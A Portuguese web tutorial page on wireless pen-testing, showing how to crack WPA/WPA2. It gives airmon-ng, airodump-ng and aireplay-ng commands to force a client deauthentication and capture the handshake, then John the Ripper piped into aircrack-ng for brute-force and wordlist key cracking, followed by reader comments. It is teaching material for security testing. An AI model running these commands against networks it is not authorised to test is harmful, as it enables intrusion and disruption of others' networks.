Pen-Test com ênfase em WLAN

Em geral, é comum encontrar redes sem fio desprovidas de segurança e passíveis de serem facilmente invadidas, comprometendo assim toda a rede, onde atualmente toda a informação digital tem um valor imensurável para o meio corporativo, sendo que ter seus dados capturados por um atacante é algo que pode gerar danos irreparáveis.

[ Hits: 43.934 ]

Por: patrick em 07/11/2010


Quebrando criptografia WPA/WPA2



Na criptografia WPA serão necessárias mais algumas ferramentas, contudo capture o handshake e use-o para a descriptografia juntamente com ferramentas de força bruta ou wordlists.

Para dar início a quebra da criptografia, utilize novamente o Kismet, pelo terminal, e identifique todas as informações precisas da rede, tais como SSID, BSSID, tipo de chave, canal utilizado dentre outras.

Figura 7. Informações da rede alvo
Para visualizar os clientes que se encontram conectados à rede, pressione a tecla "c".

Após a visualização dos clientes conectados, selecione um endereço mac de um cliente conectado para forçar a "desautenticação" seguida da captura dos handshakes, com os comandos a seguir:

# airmon-ng start <interface de rede> <canal>
# airodump-ng -w <nome do arquivo> -c <canal> <interface>
# aireplay-ng -0 1 -a <MAC DO AP> -c <MAC DO CLIENTE> <interface de rede>


Usando ataque de força bruta:

# john -incremental=digits --stdout | aircrack-ng -b <MAC DO ACCESS POINT> -w -<NOME DO ARQUIVO.cap>

Usando WORDLIST e mesclando com john:

# john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w -<NOME DO ARQUIVO*.cap>

Figura 8. Resultado do ataque usando wordlist
Existem também outros tipos de ferramentas de ataque customizado que exigem um pouco mais de conhecimento do atacante.

Página anterior     Próxima página

Páginas do artigo
   1. Introdução ao Pen-Test
   2. Quebrando WEP
   3. Quebrando criptografia WPA/WPA2
   4. Ferramentas avançadas
   5. Considerações finais
Outros artigos deste autor
Nenhum artigo encontrado.
Leitura recomendada

Rootkit: Uma nova ameaça?

Instalando Snort e Guardian no Slackware

Criando um cluster de alta performance para quebrar senhas

(IN)segurança Digital

Transferindo arquivos de modo seguro entre Windows e Linux

  
Comentários
[1] Comentário enviado por andrezc em 07/11/2010 - 14:35h

Bacana! Você tocou em um assunto interessante, Wi-fi hacking.

Nota 10.

[2] Comentário enviado por cpaynes em 07/11/2010 - 22:05h

Show de bola o assunto, creio que seja de
interesse de muitos - 10

[3] Comentário enviado por pkmelo em 08/11/2010 - 16:03h

Esse foi o tema do meu TCC, que resolvi publicar com essa galera que sempre me ajudou.




VLW.....

[4] Comentário enviado por marcelolcc em 08/11/2010 - 21:43h

bom tuto aew pra galera ....

entao estou fazendo minha monografia sobre Sistemas de detecção de intrusão sem fio .....
gostaria de saber se voce jah trabalhou com snort wireless ou tem algum material para indicar ...

estou na fase final de validação do prototipo e teste ... porém estou apanhando um pouco nas configuraçoes e validaçoes das regras ...

preciso ferramentas para testar Fake AP , AntiStumbler , Deauth Flood , MAc spoof ...

abraçoo
att Marcelo Coelho
msn/mail
marcelolcc@hotmail.com

[5] Comentário enviado por pkmelo em 10/11/2010 - 11:28h

marcelo, ja utilizei algumas dessas ferramentas e em breve estarei postando novos artigos... aguarde....

[6] Comentário enviado por smurf_o em 12/03/2011 - 01:18h

Se você é iniciante para descobrir o drive que é utilizado o comando é lspci, na documentação do kismet é chamado como capture source, e para descobrir a interface o comando é ifconfig.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts